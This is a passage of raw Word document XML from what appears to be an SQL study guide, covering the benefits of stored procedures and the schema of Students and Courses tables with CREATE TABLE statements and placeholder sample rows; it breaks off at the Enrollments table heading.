    <w:p w14:paraId="446CB590"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SELECT emp_name FROM Employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197E2530"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WHERE department_id = dept_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17656E0B"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END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293B5A0A"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You would execute the stored procedure with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F9F464"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CALL GetEmployeesByDepartment(10);  -- Returns employees from department with id 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64219A76"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Use of Stored Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782F7D8D"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Code Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stored procedures encapsulate repetitive tasks. You can reuse the same procedure in multiple applications or queries, reducing code duplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F07E83"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Improved Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since stored procedures are precompiled and stored in the database, the execution time can be faster compared to running a set of individual SQL statements every time. Execution plans are cached, making subsequent calls faster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35323DD5"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ecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By using stored procedures, you can control access to underlying data. You can grant users permission to execute a procedure without granting direct access to the tables. This enhances data security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637AF0D7"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lastRenderedPageBreak/>
        <w:t>Complex Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stored procedures can handle complex logic such as looping, condition checking, and error handling, which would be difficult to implement in a simple query. They can execute multiple SQL commands in one go.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E76477C"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Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stored procedures can handle database transactions (e.g., COMMIT, ROLLBACK) to ensure that a series of operations either complete successfully or fail together, maintaining data consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA16905"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Consistency and Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By centralizing logic in stored procedures, you ensure that the same logic is executed in a consistent manner each time, reducing errors and maintaining data integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4699CB"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Improved Maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Changes to business logic can be made in one place (the stored procedure) without needing to update multiple application components or queries. This improves maintainability and simplifies updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5886C455"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Reduce Network Traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Instead of sending multiple SQL queries from the application to the database, you can send a single call to execute a stored procedure, reducing network overhead and improving efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4526C493"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ample Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B50111E"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Consider an e-commerce application where you need to calculate and apply a discount to all items in an order. A stored procedure can be used to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ADA44F"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Validate the order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258540A5"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Apply discounts based on various rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040DBA89"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Update the order and item prices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB9BCEA"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B5E954" w14:textId="351487B2" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD197A" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stored procedures are a powerful tool for managing complex database operations, improving performance, and ensuring consistency and security. They play a crucial role in enterprise-level applications that require efficient and reusable data handling.</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="79B5D860">
          <v:rect id="_x0000_i3036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3777A163" w14:textId="0412DAC8" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="00356F93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="741" w:name="_Toc196308221"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the database schema for Students and Course table</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="741"/>
    </w:p>
    <w:p w14:paraId="6D32217C" w14:textId="4996F626" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Database Schema for Students and Courses Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373B8E0E"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To represent a typical relationship between students and courses in a relational database, we generally use two tables: </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Students</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Courses</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. There can also be a third table, </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enrollments</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, to represent the many-to-many relationship between students and courses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C57A3E"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1. Students Table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEF571D"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This table will store information about the students.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EDF564"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chema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EBBF7E"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CREATE TABLE Students (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1E072A"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student_id INT PRIMARY KEY,         -- Unique identifier for each student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D058730"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first_name VARCHAR(100),            -- First name of the student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2820075E"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last_name VARCHAR(100),             -- Last name of the student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC76D33"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date_of_birth DATE,                 -- Date of birth of the student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B52561"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email VARCHAR(100),                 -- Email address of the student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5067CAC9"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phone_number VARCHAR(15),           -- Contact number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DB64FA"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enrollment_date DATE,               -- Date when the student was enrolled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BD8A22"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gender VARCHAR(10)                  -- Gender of the student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296926D9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42042D45"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ample data for the Students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8"/>
        <w:gridCol w:w="1028"/>
        <w:gridCol w:w="990"/>
        <w:gridCol w:w="1295"/>
        <w:gridCol w:w="2138"/>
        <w:gridCol w:w="1441"/>
        <w:gridCol w:w="1563"/>
        <w:gridCol w:w="711"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="428948DF" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3549931F"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tudent_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="629DEB0B"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first_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F4EFC94"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last_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="743CB612"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date_of_birth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5821B77D"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ail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2089266E"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phone_number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="489412A4"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nrollment_date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="739BFEC2"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gender</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="3CF2B987" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27BD582C"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25EC5C90"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77A7CC3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Doe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B5233E4"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2000-01-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B9DB0D6" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A" w:rsidP="005C1C9E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId18" w:history="1">
              <w:r w:rsidRPr="005C1C9E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>john.doe@gmail.com</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B95B0BA"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1234567890</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08A97EC7"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2019-09-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69715C67"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Male</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="3DF28FA6" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46C44F47"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74222B7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Jane</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DEA3172"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Smith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C77CBAF"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1999-06-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ACE00A6" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A" w:rsidP="005C1C9E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId19" w:history="1">
              <w:r w:rsidRPr="005C1C9E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>jane.smith@yahoo.com</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BFB8E62"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0987654321</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C923AA4"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2018-09-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00E074EE"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Female</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D7DAE32" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="5546989E">
          <v:rect id="_x0000_i3037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79907FC3"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2. Courses Table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3782669C"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This table will store information about the courses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A7316F"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chema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49204318"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CREATE TABLE Courses (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BACC67"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course_id INT PRIMARY KEY,           -- Unique identifier for each course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A407FB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course_name VARCHAR(200),            -- Name of the course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377018FF"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course_description TEXT,             -- Description of the course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627BCB19"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    course_duration VARCHAR(50),         -- Duration of the course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422B5D77"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credits INT                          -- Number of credits awarded for the course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AD80D7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F346D14"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ample data for the Courses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2"/>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="3182"/>
        <w:gridCol w:w="1565"/>
        <w:gridCol w:w="693"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="50AEED16" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79498236"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course_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14154BAE"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course_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="100501A5"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course_description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B1CC998"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course_duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A6E9DF8"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credits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="1E2579F2" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61CA5575"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101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A3D5BFF"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Database Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EFF0E18"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Introduction to databases and SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69CC7AFE"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3 months</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64975F07"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="1BEDD4F4" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EC3E9B2"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102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CE90EA7"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Computer Networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73E41753"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Basics of networking and protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="105FB242"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2 months</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42463F0E"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E0F5874" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="1059D784">
          <v:rect id="_x0000_i3038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC11C60"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3. Enrollments Table:</w:t>
      </w:r>
    </w:p>
